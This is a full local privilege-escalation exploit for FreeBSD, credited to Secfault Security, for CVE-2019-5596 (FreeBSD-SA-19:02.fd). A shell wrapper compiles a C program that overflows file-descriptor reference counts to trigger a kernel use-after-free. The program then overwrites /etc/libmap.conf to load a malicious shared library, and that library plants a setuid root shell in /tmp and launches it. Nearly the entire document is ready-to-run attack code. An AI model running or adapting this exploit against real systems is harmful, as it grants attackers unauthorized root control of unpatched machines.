Share
# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation  
# Date: 2019-12-30  
# Author: Karsten König of Secfault Security  
# Twitter: @gr4yf0x  
# Kudos: Maik, greg and Dirk for discussion and inspiration  
# CVE: CVE-2019-5596  
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper  
  
#!/bin/sh  
  
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"  
  
umask 0000  
  
if [ ! -f /etc/libmap.conf ]; then  
echo "[!] libmap.conf has to exist"  
exit  
fi  
  
cp /etc/libmap.conf ./  
  
cat > heavy_cyber_weapon.c << EOF  
#include <errno.h>  
#include <fcntl.h>  
#include <pthread.h>  
#include <pthread_np.h>  
#include <signal.h>  
#include <stdlib.h>  
#include <stdio.h>  
#include <string.h>  
#include <unistd.h>  
#include <sys/cpuset.h>  
#include <sys/event.h>  
#include <sys/ioctl.h>  
#include <sys/socket.h>  
#include <sys/stat.h>  
#include <sys/sysctl.h>  
#include <sys/types.h>  
#include <sys/un.h>  
  
#define N_FDS 0xfe  
#define N_OPEN 0x2  
  
#define N 1000000  
#define NUM_THREADS 400  
#define NUM_FORKS 3  
#define FILE_SIZE 1024  
#define CHUNK_SIZE 1  
#define N_FILES 25  
  
#define SERVER_PATH "/tmp/sync_forks"  
#define DEFAULT_PATH "/tmp/pwn"  
#define HAMMER_PATH "/tmp/pwn2"  
#define ATTACK_PATH "/etc/libmap.conf"  
  
#define HOOK_LIB "libutil.so.9"  
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"  
  
#define CORE_0 0  
#define CORE_1 1  
  
#define MAX_TRIES 500  
  
struct thread_data {  
int fd;  
int fd2;  
};  
  
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;  
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;  
  
int send_recv(int fd, int sv[2], int n_fds) {  
int ret, i;  
struct iovec iov;  
struct msghdr msg;  
struct cmsghdr *cmh;  
char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];  
int *fds; char buf[1];  
  
iov.iov_base = "a";  
iov.iov_len = 1;  
  
msg.msg_name = NULL;  
msg.msg_namelen = 0;  
msg.msg_iov = &iov;  
msg.msg_iovlen = 1;  
msg.msg_control = cmsg;  
msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);  
msg.msg_flags = 0;  
  
cmh = CMSG_FIRSTHDR(&msg);  
cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);  
cmh->cmsg_level = SOL_SOCKET;  
cmh->cmsg_type = SCM_RIGHTS;  
fds = (int *)CMSG_DATA(cmsg);  
for (i = 0; i < n_fds; i++) {  
fds[i] = fd;  
}  
  
ret = sendmsg(sv[0], &msg, 0);  
if (ret == -1) {  
return 1;  
}  
  
iov.iov_base = buf;  
msg.msg_name = NULL;  
msg.msg_namelen = 0;  
msg.msg_iov = &iov;  
msg.msg_iovlen = 1;  
msg.msg_control = cmh;  
msg.msg_controllen = CMSG_SPACE(0);  
msg.msg_flags = 0;  
  
ret = recvmsg(sv[1], &msg, 0);  
if (ret == -1) {  
return 1;  
}  
  
return 0;  
}  
  
int open_tmp(char *path)  
{  
int fd;  
char *real_path;  
  
if (path != NULL) {  
real_path = malloc(strlen(path) + 1);  
strcpy(real_path, path);  
}  
else {  
real_path = malloc(strlen(DEFAULT_PATH) + 1);  
strcpy(real_path, DEFAULT_PATH);  
}  
  
if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {  
perror("[!] open");  
exit(1);  
}  
  
fchmod(fd, 0700);  
  
return fd;  
}  
  
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {  
bzero(remote, sizeof(struct sockaddr_un));  
remote->sun_family = AF_UNIX;  
strncpy(remote->sun_path, path, sizeof(remote->sun_path));  
}  
  
int bind_domain_socket(struct sockaddr_un *remote) {  
int server_socket;  
  
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {  
perror("[!] socket");  
exit(1);  
}  
  
if (bind(server_socket,   
(struct sockaddr *) remote,   
sizeof(struct sockaddr_un)) != 0) {  
perror("[!] bind");  
exit(1);  
}  
  
return server_socket;  
}  
  
int connect_domain_socket_client() {  
int client_socket;  
  
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {  
perror("[!] socket");  
exit(1);  
}  
  
return client_socket;  
}  
  
// Prevent panic at termination because f_count of the  
// corrupted struct file is 0 at the moment this function  
// is used but fd2 still points to the struct, hence fdrop()  
// is called at exit and will panic because f_count will  
// be below 0  
//  
// So we just use our known primitive to increase f_count  
void prevent_panic(int sv[2], int fd)  
{  
send_recv(fd, sv, 0xfe);  
}  
  
int stick_thread_to_core(int core) {  
/* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */  
/* if (core_id < 0 || core_id >= num_cores) */  
/* return EINVAL; */   
cpuset_t cpuset;  
CPU_ZERO(&cpuset);  
CPU_SET(core, &cpuset);  
  
pthread_t current_thread = pthread_self();   
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);  
}  
  
void *trigger_uaf(void *thread_args) {  
struct thread_data *thread_data;  
int fd, fd2;  
  
if (stick_thread_to_core(CORE_0) != 0) {  
perror("[!] [!] trigger_uaf: Could not stick thread to core");  
}  
  
thread_data = (struct thread_data *)thread_args;  
fd = thread_data->fd;  
fd2 = thread_data->fd2;  
  
printf("[+] trigger_uaf: fd: %d\n", fd);  
printf("[+] trigger_uaf: fd2: %d\n", fd2);  
  
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");  
pthread_mutex_lock(&trigger_mtx);  
pthread_cond_wait(&trigger_cond, &trigger_mtx);  
  
usleep(40);  
  
// Close to fds to trigger uaf  
//  
// This assumes that fget_write() in kern_writev()  
// was already successful!  
//  
// Otherwise kernel panic is triggered  
//  
// refcount = 2 (primitive+fget_write)  
close(fd);  
close(fd2);  
// refcount = 0 => free  
fd = open(ATTACK_PATH, O_RDONLY);  
// refcount = 1  
  
printf("[+] trigger_uaf: Opened read-only file, now hope\n");   
printf("[+] trigger_uaf: Exit\n");  
  
pthread_exit(NULL);  
}  
  
void *hammer(void *arg) {  
int i, j, k, client_socket, ret;  
char buf[FILE_SIZE], sync_buf[3];  
FILE *fd[N_FILES];  
struct sockaddr_un remote;  
  
prepare_domain_socket(&remote, SERVER_PATH);  
client_socket = connect_domain_socket_client();  
strncpy(sync_buf, "1\n", 3);  
  
for (i = 0; i < N_FILES; i++) {  
unlink(HAMMER_PATH);  
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {  
perror("[!] fopen");  
exit(1);  
}  
}  
  
for (i = 0; i < FILE_SIZE; i++) {  
buf[i] = 'a';  
}  
  
pthread_mutex_lock(&hammer_mtx);  
  
// Sometimes sendto() fails because  
// no free buffer is available  
for (;;) {  
if (sendto(client_socket,  
sync_buf,  
strlen(sync_buf), 0,  
(struct sockaddr *) &remote,  
sizeof(remote)) != -1) {  
break;  
}  
}  
  
pthread_cond_wait(&hammer_cond, &hammer_mtx);  
pthread_mutex_unlock(&hammer_mtx);  
  
for (i = 0; i < N; i++) {  
for (k = 0; k < N_FILES; k++) {  
rewind(fd[k]);   
}  
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {  
for (k = 0; k < N_FILES; k++) {  
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {  
perror("[!] fwrite");  
exit(1);  
}  
}  
fflush(NULL);  
}  
}  
  
pthread_exit(NULL);  
}  
  
// Works on UFS only  
void *monitor_dirty_buffers(void *arg) {  
int hidirtybuffers, numdirtybuffers;  
size_t len;  
  
len = sizeof(int);  
  
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {  
perror("[!] sysctlbyname hidirtybuffers");  
exit(1);  
};  
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);  
  
while(1) {  
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);  
if (numdirtybuffers >= hidirtybuffers) {  
pthread_cond_signal(&write_cond);  
pthread_cond_signal(&trigger_cond);   
printf("[+] monitor: Reached hidirtybuffers watermark\n");  
break;  
}  
}  
  
pthread_exit(NULL);  
}  
  
int check_write(int fd) {  
char buf[256];  
int nbytes;  
struct stat st;  
  
printf("[+] check_write\n");  
stat(DEFAULT_PATH, &st);  
printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);  
  
stat(ATTACK_PATH, &st);  
printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);  
  
nbytes = read(fd, buf, strlen(HOOK_LIB));  
printf("[+] Read bytes: %d\n", nbytes);  
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {  
return 1;  
}  
else if (nbytes < 0) {  
perror("[!] check_write:read");  
printf("[!] check_write:Cannot check if it worked!");  
return 1;  
}  
  
return 0;  
}  
  
void *write_to_file(void *thread_args) {  
int fd, fd2, nbytes;  
int *fd_ptr;  
char buf[256];  
struct thread_data *thread_data;  
  
if (stick_thread_to_core(CORE_1) != 0) {  
perror("[!] write_to_file: Could not stick thread to core");  
}  
  
fd_ptr = (int *) malloc(sizeof(int));  
  
thread_data = (struct thread_data *)thread_args;  
fd = thread_data->fd;  
fd2 = open(ATTACK_PATH, O_RDONLY);  
  
printf("[+] write_to_file: Wait for signal from monitor\n");   
pthread_mutex_lock(&write_mtx);  
pthread_cond_wait(&write_cond, &write_mtx);  
  
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);  
nbytes = write(fd, buf, strlen(buf));  
  
// Reopen directly after write to prevent panic later  
//  
// After the write f_count == 0 because after trigger_uaf()  
// opened the read-only file, f_count == 1 and write()  
// calls fdrop() at the end  
//  
// => f_count == 0  
//  
// A direct open hopefully assigns the now again free file  
// object to fd so that we can prevent the panic with our  
// increment primitive.  
if ((fd = open_tmp(NULL)) == -1)  
perror("[!] write_to_file: open_tmp");  
*fd_ptr = fd;  
  
if (nbytes < 0) {  
perror("[!] [!] write_to_file:write");  
} else if (nbytes > 0) {  
printf("[+] write_to_file: We have written something...\n");  
if (check_write(fd2) > 0)  
printf("[+] write_to_file: It (probably) worked!\n");  
else  
printf("[!] write_to_file: It worked not :(\n");  
}  
  
printf("[+] write_to_file: Exit\n");  
pthread_exit(fd_ptr);  
}  
  
void prepare(int sv[2], int fds[2]) {  
int fd, fd2, i;  
  
printf("[+] Start UaF preparation\n");  
printf("[+] This can take a while\n");  
  
// Get a single file descriptor to send via the socket  
if ((fd = open_tmp(NULL)) == -1) {  
perror("[!] open_tmp");  
exit(1);  
}  
  
if ((fd2 = dup(fd)) == -1) {  
perror("[!] dup");  
exit(1);  
}  
  
// fp->f_count will increment by 0xfe in one iteration  
// doing this 16909320 times will lead to  
// f_count = 16909320 * 0xfe + 2 = 0xfffffff2  
// Note the 2 because of the former call of dup() and  
// the first open().  
//  
// To test our trigger we can send 0xd more fd's what  
// would to an f_count of 0 when fdclose() is called in  
// m_dispose_extcontrolm. fdrop() will reduce f_count to  
// 0xffffffff = -1 and ultimately panic when _fdrop() is  
// called because the latter asserts that f_count is 0.  
// _fdrop is called in the first place because  
// refcount_release() only checks that f_count is less or  
// equal 1 to recognize the last reference.  
//  
// If we want to trigger the free without panic, we have  
// to send 0xf fds and close an own what will lead to an  
// fdrop() call without panic as f_count is 1 and reduced  
// to 0 by close(). The unclosed descriptor references now  
// a free 'struct file'.  
for (i = 0; i < 16909320; i++) {  
if (i % 1690930 == 0) {  
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));  
}  
  
if (send_recv(fd, sv, N_FDS)) {  
perror("[!] prepare:send_recv");  
exit(1);  
}  
}  
if (send_recv(fd, sv, 0xf)) {  
perror("[!] prepare:send_recv");  
exit(1);  
}  
  
fds[0] = fd;  
fds[1] = fd2;  
  
printf("[+] Finished UaF preparation\n");  
}  
  
void read_thread_status(int server_socket) {  
int bytes_rec, count;  
struct sockaddr_un client;  
socklen_t len;  
char buf[256];  
struct timeval tv;  
  
tv.tv_sec = 10;  
tv.tv_usec = 0;  
setsockopt(server_socket,  
SOL_SOCKET, SO_RCVTIMEO,  
(const char*)&tv, sizeof tv);  
  
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {  
if (count % 100 == 0) {  
printf("[+] Hammer threads ready: %d\n", count);  
}  
bzero(&client, sizeof(struct sockaddr_un));  
bzero(buf, 256);  
  
len = sizeof(struct sockaddr_un);  
if ((bytes_rec = recvfrom(server_socket,  
buf, 256, 0,  
(struct sockaddr *) &client,  
&len)) == -1) {  
perror("[!] recvfrom");  
break;  
}  
}  
  
if (count != NUM_FORKS * NUM_THREADS) {  
printf("[!] Could not create all hammer threads, will try though!\n");  
}  
}  
  
void fire() {  
int i, j, fd, fd2, bytes_rec, server_socket;  
int sv[2], fds[2], hammer_socket[NUM_FORKS];  
int *fd_ptr;  
char socket_path[256], sync_buf[3], buf[256];  
pthread_t write_thread, trigger_thread, monitor_thread;  
pthread_t hammer_threads[NUM_THREADS];  
pid_t pids[NUM_FORKS];  
socklen_t len;  
struct thread_data thread_data;  
struct sockaddr_un server, client;  
struct sockaddr_un hammer_socket_addr[NUM_FORKS];  
  
// Socket for receiving thread status  
unlink(SERVER_PATH);  
prepare_domain_socket(&server, SERVER_PATH);  
server_socket = bind_domain_socket(&server);  
  
// Sockets to receive hammer signal  
for (i = 0; i < NUM_FORKS; i++) {  
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);  
unlink(socket_path);  
prepare_domain_socket(&hammer_socket_addr[i], socket_path);  
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);  
}  
  
strncpy(sync_buf, "1\n", 3);  
len = sizeof(struct sockaddr_un);  
  
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {  
perror("[!] socketpair");  
exit(1);  
}  
  
pthread_mutex_init(&write_mtx, NULL);  
pthread_mutex_init(&trigger_mtx, NULL);  
pthread_cond_init(&write_cond, NULL);  
pthread_cond_init(&trigger_cond, NULL);  
  
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);  
  
prepare(sv, fds);  
fd = fds[0];  
fd2 = fds[1];  
  
thread_data.fd = fd;  
thread_data.fd2 = fd2;  
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);  
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);  
  
for (j = 0; j < NUM_FORKS; j++) {  
if ((pids[j] = fork()) < 0) {  
perror("[!] fork");  
abort();  
}  
else if (pids[j] == 0) {  
pthread_mutex_init(&hammer_mtx, NULL);  
pthread_cond_init(&hammer_cond, NULL);  
  
close(fd);  
close(fd2);  
  
/* Prevent that a file stream in the hammer threads  
* gets the file descriptor of fd for debugging purposes  
*/  
if ((fd = open_tmp("/tmp/dummy")) == -1)  
perror("[!] dummy");  
if ((fd2 = open_tmp("/tmp/dummy2")) == -1)  
perror("[!] dummy2");  
printf("[+] Fork %d fd: %d\n", j, fd);  
printf("[+] Fork %d fd2: %d\n", j, fd2);  
  
for (i = 0; i < NUM_THREADS; i++) {  
pthread_create(&hammer_threads[i], NULL, hammer, NULL);  
}  
  
printf("[+] Fork %d created all threads\n", j);  
  
if ((bytes_rec = recvfrom(hammer_socket[j],  
buf, 256, 0,  
(struct sockaddr *) &client,  
&len)) == -1) {  
perror("[!] accept");  
abort();  
}  
  
pthread_cond_broadcast(&hammer_cond);  
  
for (i = 0; i < NUM_THREADS; i++) {  
pthread_join(hammer_threads[i], NULL);  
}  
  
pthread_cond_destroy(&hammer_cond);  
pthread_mutex_destroy(&hammer_mtx);  
  
exit(0);  
} else {  
printf("[+] Created child with PID %d\n", pids[j]);   
}  
}   
  
read_thread_status(server_socket);  
printf("[+] Send signal to Start Hammering\n");  
for (i = 0; i < NUM_FORKS; i++) {  
if (sendto(hammer_socket[i],  
sync_buf,  
strlen(sync_buf), 0,  
(struct sockaddr *) &hammer_socket_addr[i],  
sizeof(hammer_socket_addr[0])) == -1) {  
perror("[!] sendto");  
exit(1);  
}  
}  
  
pthread_join(monitor_thread, NULL);  
for (i = 0; i < NUM_FORKS; i++) {  
kill(pids[i], SIGKILL);  
printf("[+] Killed %d\n", pids[i]);  
}  
  
pthread_join(write_thread, (void **) &fd_ptr);   
pthread_join(trigger_thread, NULL);  
  
pthread_mutex_destroy(&write_mtx);  
pthread_mutex_destroy(&trigger_mtx);  
pthread_cond_destroy(&write_cond);  
pthread_cond_destroy(&trigger_cond);  
  
printf("[+] Returned fd: %d\n", *fd_ptr);  
prevent_panic(sv, *fd_ptr);  
  
// fd was acquired from write_to_file  
// which allocs a pointer for it  
free(fd_ptr);  
}  
  
int main(int argc, char **argv)  
{  
setbuf(stdout, NULL);  
  
fire();  
  
return 0;  
}  
  
EOF  
  
cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c  
  
cat > program.c << EOF  
#include <unistd.h>  
#include <stdio.h>  
#include <sys/types.h>  
#include <stdlib.h>  
  
void _init()  
{  
if (!geteuid())  
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);  
}  
  
EOF  
  
cc -o program.o -c program.c -fPIC  
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles  
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0  
  
echo "[+] Firing the Heavy Cyber Weapon"  
./heavy_cyber_weapon  
su  
  
if [ -f /tmp/xxxx ]; then  
echo "[+] Enjoy!"  
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"  
/tmp/xxxx  
else  
echo "[!] FAIL"  
fi